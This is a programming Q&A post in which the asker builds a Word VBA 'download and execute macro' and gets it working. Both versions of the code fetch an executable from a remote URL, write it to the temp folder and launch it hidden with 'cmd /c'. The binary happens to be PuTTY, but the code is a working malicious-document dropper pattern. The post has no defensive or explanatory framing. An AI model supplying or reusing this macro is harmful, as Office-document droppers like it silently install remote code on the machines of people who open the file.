# Compilation error vbs only in macro word?

Tags: vbscript, ms-word

I was trying to make a download and execute macro. I finished the vbs code and it worked fine, I then put it in some subs and tried to run it as a macro. I get the error

> Compile error, Syntax Error: objXMLHTTP.send()

It's weird that this only produces an error as a macro.

Here is the full code:

```
Sub macro()
  Const ADTYPEBINARY = 1
  Const ADSAVECREATEOVERWRITE = 2

  Dim xHttp
  Dim bStrm
  Dim filename
  Dim fso

  Set fso = CreateObject("Scripting.FileSystemObject")
  Dim tempfolder
  Const TemporaryFolder = 2
  Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)
  strFileURL = "ftp://username:pass@ftpserver.com/putty.exe"
  strHDLocation = tempfolder & "/putty.exe"

  Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

  objXMLHTTP.Open "GET", strFileURL, False

  objXMLHTTP.send()

  If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
  Else
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0    'Set the stream position to the start

    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
  End If

  Set objXMLHTTP = Nothing

  Set objShell = WScript.CreateObject("WScript.Shell")
  objShell.Run "cmd /c " & tempfolder & "/putty.exe", 0, True
End Sub
```

Comment: Did you verify (Google) that the function `objXMLHTTP.send()` is supported within MS-Word? VBSCRIPT is not the same as VBA and the libraries used in each Office application have specific functionalities (e.g. try to refer to a spreadsheet in a PowerPoint macro and see what happens).

Comment: no, thanks i'll look for the supported similar functions

Comment: Can you provide the error logs.

Answer (score 0):

Thanks I changed it to this and it works fine:

```
Sub book()
    Set objShell = CreateObject("Wscript.Shell")
    Dim fso

    Set fso = CreateObject("Scripting.FileSystemObject")
    Dim tempfolder
    Const TemporaryFolder = 2
    Set tempfolder = fso.GetSpecialFolder(TemporaryFolder)

    Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
    Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
    xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", False
    xHttp.Send

    With bStrm
        .Type = 1 '//binary
        .Open
        .Write xHttp.responseBody
        .SaveTofile tempfolder & "/putty.exe", 2 '//overwrite
    End With

    objShell.Run "cmd /c " & tempfolder & "/putty.exe", 0, True
End Sub
```

Comment: So, if my comment helped you, consider up-voting (I enjoy getting _virtual remuneration_ :-)).